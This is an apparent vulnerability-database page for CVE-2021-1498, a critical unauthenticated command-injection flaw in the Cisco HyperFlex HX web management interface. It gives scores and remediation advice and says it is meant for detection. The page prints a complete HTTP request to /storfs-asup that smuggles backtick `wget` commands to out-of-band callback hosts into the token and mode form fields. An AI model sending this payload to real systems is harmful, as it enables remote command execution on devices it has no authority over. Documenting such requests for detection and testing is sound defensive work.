🔙 목록으로 돌아가기

CVE-2021-1498: Cisco HyperFlex HX Data Platform - Remote Command Execution

TitleCisco HyperFlex HX Data Platform - Remote Command Execution
Authorgy741
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
RemediationApply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.94012
CVE IDCVE-2021-1498
CWE IDCWE-78
Tags cve cve2021 kev packetstorm cisco rce oast mirai vkev vuln

🔍 Vulnerability Description

Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

🌐 HTTP Request

POST /storfs-asup HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Content-Length: 130
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=&token=`wget http://d5jn3fple0o2ts7nl9u0gc3gzn89jr4cj.oast.me`&mode=`wget http://d5jn3fple0o2ts7nl9u064ozes8t9h3rh.oast.me`

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-1498.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-1498.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A